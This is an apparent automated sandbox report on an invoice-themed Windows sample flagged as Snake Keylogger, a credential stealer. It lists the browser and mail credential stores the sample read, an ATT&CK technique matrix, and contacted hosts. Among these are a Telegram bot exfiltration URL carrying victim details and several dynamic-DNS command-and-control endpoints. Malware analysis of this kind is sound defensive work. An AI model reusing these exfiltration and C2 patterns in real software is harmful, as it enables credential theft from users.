Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7552, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7552, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FACTURA RAGOZA.exe	11%	ReversingLabs	Win32.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe	11%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.174	true	false	unknown
drive.usercontent.google.com	142.250.184.225	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2021/10/2024%20/%2020:10:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.186	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000006.00000002.2940688123.0000000023E52000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2235935141.0000000005006000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2235935141.0000000005006000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	msiexec.exe, 00000006.00000002.2940688123.0000000023E4D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a	msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000002.2923740426.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000006.00000002.2942294889.0000000024EDB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D37000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D85000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024DAC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	FACTURA RAGOZA.exe, FACTURA RAGOZA.exe.1.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000006.00000002.2942294889.0000000024EDB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D37000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D85000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024DAC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.2940688123.0000000023E21000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023E12000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/155.94.241.186$	msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D1D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023CD7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2235935141.0000000005006000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error	FACTURA RAGOZA.exe, FACTURA RAGOZA.exe.1.dr	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000001.00000002.2241151910.0000000007374000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2235935141.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/	msiexec.exe, 00000006.00000002.2923740426.000000000068A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000006.00000002.2942294889.0000000024FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EB7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EE2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D13000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000006.00000002.2940688123.0000000023E1C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D1D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023CAD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://apis.google.com	msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000006.00000002.2942294889.0000000024FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EB7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EE2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D13000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2235935141.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2940688123.0000000023CAD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
142.250.186.174	drive.google.com	United States	15169	GOOGLEUS	false
142.250.184.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538485
Start date and time:	2024-10-21 11:54:59 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FACTURA RAGOZA.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/14@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 94% Number of executed functions: 126 Number of non-executed functions: 60
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7552 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5808 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: FACTURA RAGOZA.exe

Simulations

Behavior and APIs

Time	Type	Description
05:55:52	API Interceptor	44x Sleep call for process: powershell.exe modified
05:57:05	API Interceptor	1099x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	http://comodozeropoint.com/updates/1736162964/N1/Team.exe	Get hash	malicious	Unknown	Browse	comodozeropoint.com/updates/1736162964/N1/Team.exe
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	ZP4KZDHVHWZZ2DC13DMX.exe	Get hash	malicious	Amadey	Browse	tipinfodownload-soft1.com/g9jvjfd73/index.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/loadbit
	PO#071024.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe	Get hash	malicious	Unknown	Browse	www.ergeneescortg.xyz/guou/
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse	dsye.shop/DS341/index.php
158.101.44.242	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Supplier RFQ ID 365242213q___________________________pdf.exe	Get hash	malicious	Snake Keylogger, XRed	Browse	checkip.dyndns.org/
	RFQ-KTE-07102024.pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Request for Q uotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	BON 521264.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ACCOUNTXSTATEMENT.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	uYP4XsZFKS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
api.telegram.org	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	aZm1EZ2IYr.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Unlock_Tool_2.4.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	https://s3.us-east-2.amazonaws.com/revealedgceconomies/vdiq197yvi/ImgBurn_822881.exe?	Get hash	malicious	Unknown	Browse	104.26.5.9
	Spedizione.vbs	Get hash	malicious	Unknown	Browse	172.67.75.40
	https://s3.us-east-2.amazonaws.com/revealedgceconomies/vdiq197yvi/ImgBurn_822881.exe?	Get hash	malicious	Unknown	Browse	104.26.5.9
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	http://www.5movierulz.mom	Get hash	malicious	Unknown	Browse	172.67.72.9
	http://lvlup.page	Get hash	malicious	Unknown	Browse	172.67.184.158
	http://google.com	Get hash	malicious	Unknown	Browse	172.64.41.3
ORACLE-BMC-31898US	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
